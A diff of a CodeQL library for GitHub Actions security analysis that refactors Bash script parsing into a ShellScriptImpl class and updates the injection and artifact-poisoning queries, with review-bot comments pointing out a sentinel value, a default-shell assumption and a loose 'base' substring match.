@@ -165,6 +179,61 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { string getValue() { result = value.getValue() } } +class ShellScriptImpl extends ScalarValueImpl { + ShellScriptImpl() { exists(YamlMapping run | run.lookup("run").(YamlScalar) = this.getNode()) } + + string getRawScript() { result = this.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + + RunImpl getEnclosingRun() { result.getNode().lookup("run") = this.getNode() } + + abstract string getStmt(int i); + + abstract string getAStmt(); + + abstract string getCommand(int i); + + string getACommand() { + if this.getEnclosingRun().getShell().matches("bash%") + then result = this.(BashShellScript).getACommand() + else + if this.getEnclosingRun().getShell().matches("pwsh%") + then result = this.(PowerShellScript).getACommand() + else result = "NOT IMPLEMENTED" + } + + abstract string getFileReadCommand(int i); + + abstract string getAFileReadCommand(); + + abstract predicate getAssignment(int i, string name, string data); + + abstract predicate getAnAssignment(string name, string data); + + abstract predicate getAWriteToGitHubEnv(string name, string data); + + abstract predicate getAWriteToGitHubOutput(string name, string data); + + abstract predicate getAWriteToGitHubPath(string data); + + abstract predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubPathWrite(string var); + + abstract predicate getACmdReachingGitHubPathWrite(string cmd); + + abstract predicate fileToGitHubEnv(string path); + + abstract predicate fileToGitHubOutput(string path); + + abstract predicate fileToGitHubPath(string path); +} + class ExpressionImpl extends AstNodeImpl, TExpressionNode { 
YamlNode key; YamlString value; @@ -493,6 +562,28 @@ class InputsImpl extends AstNodeImpl, TInputsNode { } } +class DefaultsImpl extends AstNodeImpl, TDefaultsNode { + YamlMapping n; + + DefaultsImpl() { this = TDefaultsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "DefaultsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + ScalarValueImpl getValue(string name, string prop) { + n.lookup(name).(YamlMapping).lookup(prop) = result.getNode() + } +} + class InputImpl extends AstNodeImpl, TInputNode { YamlValue n; @@ -1314,20 +1405,18 @@ class ExternalJobImpl extends JobImpl, UsesImpl { class RunImpl extends StepImpl { YamlScalar script; + ScalarValueImpl scriptScalar; - RunImpl() { this.getNode().lookup("run") = script } - - string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } - - ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } - - ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } + RunImpl() { + this.getNode().lookup("run") = script and + scriptScalar = TScalarValueNode(script) + } override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } - /** Gets the working directory for this `runs` mapping. */ + /** Gets the working directory for this `run` mapping. */ string getWorkingDirectory() { if exists(n.lookup("working-directory").(YamlString).getValue()) then 
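Review bot: `ShellScriptImpl.getACommand()` is the one member that is not abstract: it casts `this` to `BashShellScript` or `PowerShellScript` by shell name and otherwise yields the literal `"NOT IMPLEMENTED"`, which then reaches callers as if it were a command. Both subclasses in this commit already override `getACommand()`, so the dispatch duplicates what the class hierarchy does and makes this internal file depend on Bash.qll and PowerShell.qll. Declaring it like its siblings, `abstract string getACommand();`, removes the sentinel; for unsupported shells the predicate then simply has no result.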
@@ -1339,268 +1428,19 @@ class RunImpl extends StepImpl { else result = "GITHUB_WORKSPACE/" } - private string lineProducer(int i) { - result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + /** Gets the shell for this `run` mapping. */ + string getShell() { + if exists(n.lookup("shell").(YamlString).getValue()) + then result = n.lookup("shell").(YamlString).getValue() + else + if exists(this.getInScopeDefaultValue("run", "shell")) + then result = this.getInScopeDefaultValue("run", "shell").getValue() + else result = "bash" } - private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { - exists(string line | line = this.lineProducer(k) | - exists(int i, int j | - cmdSubs = - // $() cmd substitution - line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) - .regexpReplaceAll("^\\$\\(", "") - .regexpReplaceAll("\\)$", "") and - id = "cmdsubs:" + k + ":" + i + ":" + j - ) - or - exists(int i, int j | - // `...` cmd substitution - cmdSubs = - line.regexpFind("\\`[^\\`]+\\`", i, j) - .regexpReplaceAll("^\\`", "") - .regexpReplaceAll("\\`$", "") and - id = "cmd:" + k + ":" + i + ":" + j - ) - ) - } + ShellScriptImpl getScript() { result = scriptScalar } - private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { - old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and - this.cmdSubstitutionReplacement(old, new, _) - } - - private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.lineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(target, replacement) - ) - } - - private string cmdSubstitutedLineProducer(int i) { - // script lines where any command substitution 
has been replaced with a unique placeholder - result = - max(int round, string new | - this.doReplaceCmdSubstitutions(i, round, _, new) - | - new order by round - ) - or - this.cmdSubstitutionReplacement(result, _, i) - } - - private predicate quotedStringReplacement(string quotedStr, string id) { - exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | - exists(int i, int j | - // double quoted string - quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and - id = - "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + - quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") - ) - or - exists(int i, int j | - // single quoted string - quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and - id = - "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + - quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") - ) - ) - } - - private predicate rankedQuotedStringReplacements(int i, string old, string new) { - old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and - this.quotedStringReplacement(old, new) - } - - private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.cmdSubstitutedLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doReplaceQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(target, replacement) - ) - } - - private string quotedStringLineProducer(int i) { - result = - max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) - } - - private string stmtProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and - // when splitting the line with a separator that is not present, the result is the original line which may contain other separators - // we only one the split parts that 
do not contain any of the separators - not result.indexOf(Bash::splitSeparator()) > -1 - } - - private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.stmtProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - private string restoredStmtQuotedStringLineProducer(int i) { - result = - max(int round, string new | - this.doStmtRestoreQuotedStrings(i, round, _, new) - | - new order by round - ) - } - - private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.restoredStmtQuotedStringLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - string getStmt(int i) { - result = - max(int round, string new | - this.doStmtRestoreCmdSubstitutions(i, round, _, new) - | - new order by round - ) - } - - string getAStmt() { result = this.getStmt(_) } - - private string cmdProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and - // when splitting the line with a separator that is not present, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::separator()) > -1 - } - - private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.cmdProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string 
replacement | - this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - private string restoredCmdQuotedStringLineProducer(int i) { - result = - max(int round, string new | - this.doCmdRestoreQuotedStrings(i, round, _, new) - | - new order by round - ) - } - - private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.restoredCmdQuotedStringLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - string getCmd(int i) { - result = - max(int round, string new | - this.doCmdRestoreCmdSubstitutions(i, round, _, new) - | - new order by round - ) - } - - string getACmd() { result = this.getCmd(_) } - - string getCommand(int i) { - result = this.getCmd(i) and - // exclude variable declarations - not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and - // exclude the following keywords - not result = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", - "esac", "{", "}" - ] - } - - string getACommand() { result = this.getCommand(_) } - - predicate getAssignment(int i, string name, string value) { - exists(string stmt | - stmt = this.getStmt(i) and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) - ) - } - - predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } - - predicate getAWriteToGitHubEnv(string name, string value) { - exists(string raw | - Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and - Bash::extractVariableAndValue(raw, name, value) - ) - } - - 
predicate getAWriteToGitHubOutput(string name, string value) { - exists(string raw | - Bash::extractFileWrite(this.getScript(), "GITHUB_OUTPUT", raw) and - Bash::extractVariableAndValue(raw, name, value) - ) - } - - predicate getAWriteToGitHubPath(string value) { - Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) - } - - predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { - Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) - } - - predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { - Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) - } - - predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { - Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) - } - - predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { - Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) - } + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } } /** diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8a6e52309fb..5ceab79820b 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -282,7 +282,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { ( child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr() or - child = super.getScriptScalar() + child = super.getScript() ) and l = child.getLocation() | diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index f1fb2073ed0..b30fd5495ed 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
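Review bot: `getShell()` falls back to `bash` whenever neither the step nor an in-scope `defaults.run.shell` names a shell, without looking at the runner. On Windows runners GitHub's default shell is `pwsh`, so such steps would be classified as `BashShellScript` and their PowerShell text run through the Bash regexes. If `runs-on` cannot be resolved here, the fallback should at least be documented, e.g. `// no shell given: assume bash (default on non-Windows runners); TODO consult runs-on`. A `shell` given as an expression such as `${{ matrix.shell }}` is returned verbatim and will match neither script class.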
@@ -86,7 +86,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { exists(Uses uses | checkout = uses and uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or checkout instanceof GitMutableRefCheckout @@ -97,9 +98,9 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { or checkout instanceof GhSHACheckout ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and - run.getACommand() = cmd and + run.getScript().getACommand() = cmd and cmd.indexOf("git") = 0 and untrustedGitCommandsDataModel(cmd_regex, flag) and cmd.regexpMatch(cmd_regex) @@ -127,8 +128,8 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) // BODY=$(jq -r '.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') GitHubEventPathSource() { - this.asExpr() = run.getScriptScalar() and - run.getACommand() = cmd and + this.asExpr() = run.getScript() and + run.getScript().getACommand() = cmd and cmd.matches("jq%") and cmd.matches("%GITHUB_EVENT_PATH%") and exists(string regexp | @@ -207,10 +208,11 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses u | - this.asExpr() = u and - u.getCallee() = "actions/checkout" and - exists(u.getArgument("ref")) + exists(Uses uses | + this.asExpr() = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or this.asExpr() instanceof GitMutableRefCheckout 
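Review bot: The new exclusion `not uses.getArgument("ref").matches("%base%")` in `GitCommandSource` is a plain substring test, so any `ref` value that merely contains the text `base` stops being a source. That includes a branch name such as `rebase-fix`, or an expression that mixes a head ref with a base-ref fallback. For a security query this turns a false-positive fix into possible silent false negatives. The same condition is added to `CheckoutSource` (hunk `@@ -207,10 +208,11 @@`) and to `OutputClobberingFromFileReadSink` in OutputClobberingQuery.qll, so it would be safer as one shared predicate that matches only the base contexts (`github.base_ref`, `github.event.pull_request.base.ref`, `github.event.pull_request.base.sha`). That predicate could carry a comment such as `// base ref/sha is chosen by the target repository, not by the PR author`. The enclosing characteristic predicates begin outside these hunks.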
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 787a5f72084..0f7e906685b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,7 +23,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(Run run, string var, string field | run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run and - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field) and c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } @@ -35,8 +35,8 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: run.getInScopeEnvVarExpr(var) = pred.asExpr() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", field) and - c = any(DataFlow::FieldContent ct | ct.getName() = field) //and + run.getScript().getAnEnvReachingGitHubEnvWrite(var, field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } @@ -55,12 +55,12 @@ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Dat or exists(FileSource source | source.asExpr().(Step).getAFollowingStep() = run and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getAFileReadCommand() = cmd ) ) and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and + run.getScript().getACmdReachingGitHubOutputWrite(cmd, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and + pred.asExpr() = run.getScript() and succ.asExpr() = run ) } 
@@ -80,12 +80,12 @@ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFl or exists(FileSource source | source.asExpr().(Step).getAFollowingStep() = run and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getAFileReadCommand() = cmd ) ) and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and + pred.asExpr() = run.getScript() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index de64a0dd6f4..e9d5a44c929 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -22,14 +22,14 @@ class AdditionalTaintStep extends Unit { } /** - * A download artifact step followed by a step that may use downloaded artifacts. + * A file source step followed by a Run step may read the file. */ predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(FileSource source, Run run | pred = source and source.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 18ff398ebab..a0309437292 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll 
@@ -17,11 +17,11 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { bindingset[var] predicate envToArgInjSink(string var, Run run, string command) { exists(string argument, string cmd, string regexp, int command_group, int argument_group | - run.getACommand() = cmd and + run.getScript().getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and command = cmd.regexpCapture(regexp, command_group) and argument = cmd.regexpCapture(regexp, argument_group) and - Bash::envReachingRunExpr(run, var, argument) and + Bash::envReachingRunExpr(run.getScript(), var, argument) and exists(run.getInScopeEnvVarExpr(var)) ) } @@ -40,15 +40,15 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ArgumentInjectionFromEnvVarSink() { exists(Run run, string var | envToArgInjSink(var, run, command) and - run.getScriptScalar() = this.asExpr() and + run.getScript() = this.asExpr() and exists(run.getInScopeEnvVarExpr(var)) ) or exists( Run run, string cmd, string argument, string regexp, int argument_group, int command_group | - run.getACommand() = cmd and - run.getScriptScalar() = this.asExpr() and + run.getScript().getACommand() = cmd and + run.getScript() = this.asExpr() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and command = cmd.regexpCapture(regexp, command_group) and @@ -75,8 +75,8 @@ class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { int command_group | run = source.getEnclosingRun() and - this.asExpr() = run.getScriptScalar() and - cmd = run.getACommand() and + this.asExpr() = run.getScript() and + cmd = run.getScript().getACommand() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and command = cmd.regexpCapture(regexp, command_group) 
@@ -106,8 +106,8 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { exists( Run run, string argument, string cmd, string regexp, int command_group, int argument_group | - run.getScriptScalar() = source.asExpr() and - run.getACommand() = cmd and + run.getScript() = source.asExpr() and + run.getScript().getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") @@ -119,7 +119,7 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and + succ.asExpr() = run.getScript() and envToArgInjSink(var, run, _) ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 31a9edd03b3..d06b125ca32 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -155,15 +155,21 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use } override string getPath() { - if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + if + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else - if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } 
@@ -172,31 +178,37 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and - this.getACommand().matches("%github.event.workflow_run.id%") and + this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + this.getScript().getACommand().matches("%github.event.workflow_run.id%") and ( - this.getACommand().regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(this.getACommand() + normalizePath(trimQuotes(this.getScript() + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) or - this.getACommand().regexpMatch(unzipRegexp()) + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } 
@@ -213,24 +225,30 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.getACommand().matches("%github.event.workflow_run.artifacts_url%") and + this.getScript().getACommand().matches("%github.event.workflow_run.artifacts_url%") and ( - this.getACommand().regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(this.getACommand() + normalizePath(trimQuotes(this.getScript() + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else result = "GITHUB_WORKSPACE/" @@ -246,7 +264,7 @@ class ArtifactPoisoningSink extends DataFlow::Node { // excluding artifacts downloaded to /tmp not download.getPath().regexpMatch("^/tmp.*") and ( - poisonable.(Run).getScriptScalar() = this.asExpr() and + poisonable.(Run).getScript() = this.asExpr() and ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact 
@@ -280,7 +298,7 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { pred instanceof ArtifactSource and pred.asExpr().(Step).getAFollowingStep() = step and ( - succ.asExpr() = step.(Run).getScriptScalar() or + succ.asExpr() = step.(Run).getScript() or succ.asExpr() = step.(UsesStep) ) ) @@ -288,8 +306,8 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof ArtifactSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index ca72fe00d16..fac498f72da 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -31,8 +31,8 @@ private module CodeInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 86de44c3b5c..86c7d989522 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -283,8 +283,8 @@ class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { BashCommentVsHeadDateCheck() { // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then exists(string cmd1, string cmd2 | - cmd1 = this.getACommand() and - cmd2 = this.getACommand() and + cmd1 = this.getScript().getACommand() and + cmd2 = this.getScript().getACommand() and not cmd1 = cmd2 and cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 1f53c938436..859f625e068 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -25,15 +25,15 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { step instanceof UntrustedArtifactDownloadStep or step instanceof PRHeadCheckoutStep ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( exists(string cmd | - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_PATH", _) and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getACmdReachingGitHubPathWrite(cmd) and + run.getScript().getAFileReadCommand() = cmd ) or - Bash::fileToGitHubPath(run, _) + run.getScript().fileToGitHubPath(_) ) ) } 
@@ -49,9 +49,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { EnvPathInjectionFromCommandSink() { exists(CommandSource source | - this.asExpr() = source.getEnclosingRun().getScriptScalar() and - Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_PATH", - _) + this.asExpr() = source.getEnclosingRun().getScript() and + source.getEnclosingRun().getScript().getACmdReachingGitHubPathWrite(source.getCommand()) ) } } @@ -67,9 +66,9 @@ class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_PATH", _) and + run.getScript().getAnEnvReachingGitHubPathWrite(var_name) and exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScript() = this.asExpr() ) } } @@ -90,8 +89,12 @@ private module EnvPathInjectionConfig 